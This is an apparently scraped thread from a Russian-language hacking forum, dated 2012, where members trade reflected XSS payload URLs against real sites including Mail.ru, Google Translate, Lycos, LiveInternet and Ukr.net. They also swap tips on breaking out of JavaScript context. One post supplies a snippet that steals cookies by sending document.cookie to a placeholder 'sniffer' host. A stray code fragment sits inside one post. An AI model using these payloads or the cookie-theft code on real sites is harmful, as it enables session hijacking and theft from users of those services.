 |
|
23.01.2012, 21:06
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
http://techguru.aol.com/?ncid=txtlnkusstor00000094">alert(String.fromCharCode(88,83,83,32,65,78,84,7 3,67,72,65,84))
|
|
|
26.01.2012, 21:25
|
|
Участник форума
Регистрация: 01.09.2011
Сообщений: 134
С нами:
7735286
Репутация:
1
|
|
LiveInternet
Код:
http://www.liveinternet.ru/jsearch/?s=">alert('xss')
|
|
|
|
30.01.2012, 16:19
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
тИЦ 100
PR 7
Код:
http://games.lycos.com/board-game/gacopyrze-vs_-wilkolkialert(document.cookie)/
|
|
|
|
02.02.2012, 19:06
|
|
Участник форума
Регистрация: 01.09.2011
Сообщений: 134
С нами:
7735286
Репутация:
1
|
|
Mail.ru
Код:
http://apps.hi-tech.mail.ru/contest/add/?comment=&Domain=mail.ru&Login=&Password=&platform=">alert('xss')
|
|
|
|
04.02.2012, 10:27
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
kravch_v, не надо юзать HTML, если XSS внутри JS-кода.
http://apps.hi-tech.mail.ru/contest/add/?platform='%3Balert('xss')%3Ba='
|
|
|
|
04.02.2012, 19:44
|
|
Участник форума
Регистрация: 01.09.2011
Сообщений: 134
С нами:
7735286
Репутация:
1
|
|
M_script, спасибо!
Google XSS
Код:
http://translate.google.ru/translate?sl=en&tl=ru&js=n&prev=_t&hl=ru&ie=UTF-8&layout=2&eotf=1&u=http://ссылка_на_уязвимый_код
Пример:
Код:
http://translate.google.ru/translate?sl=en&tl=ru&js=n&prev=_t&hl=ru&ie=UTF-8&layout=2&eotf=1&u=http://exploit-db.ru/googlexss/
Для кражи кук используйте следующий код:
Код:
img = new Image(); img.src = "http://адрес_сниффера.gif?"+document.cookie;
// M_script, то сообщение кто-то удалил. Печеньки я каким-то образом крал. Пассивки на ютубе нету. |
|
|
|
04.02.2012, 20:12
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
kravch_v, ты в начале января уже выкладывал эту XSSку на гугле. Там выполнение JS-кода происходит не на google.ru(com), а на googleusercontent.com. Соответственно, куки будут с домена googleusercontent.com. Как их можно использовать на практике?
upd:
Сообщение от kravch_v
Печеньки я каким-то образом крал
Куки на googleusercontent.com есть и украсть их можно, но в них не содержится сессии google.com
|
|
|
|
05.02.2012, 01:22
|
|
Участник форума
Регистрация: 01.09.2011
Сообщений: 134
С нами:
7735286
Репутация:
1
|
|
Mail.Ru - Недостаточная фильтрация в cookie
Уязвимый код (cookie):
Код:
Mpop=test:test:test@test.ru">alert('xss');
Заходим на w2.dwar.mail.ru и код успешно выполняется. |
|
|
|
05.02.2012, 13:02
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Почта Укр.нет
[HTML]
http://kino.ukr.net/search?query="+onMouseover=alert(document.cookie)+ ">+
[/QUOTE]
" if author else f"
По сути можно поставить onerror и onload, нужно только подумать как .
|
|
|
|
05.02.2012, 13:56
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами:
11322426
Репутация:
0
|
|
[QUOTE="Unix@"]
http://kino.ukr.net/search?query="+onMouseover=alert(document.cookie)+ ">++
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
